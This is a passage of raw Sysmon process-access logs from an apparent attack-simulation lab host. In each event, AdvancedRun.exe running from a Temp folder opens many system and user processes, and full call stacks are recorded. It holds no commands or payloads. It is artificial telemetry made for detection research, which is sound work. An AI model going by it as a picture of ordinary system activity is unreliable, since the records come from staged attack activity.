20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004079759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\App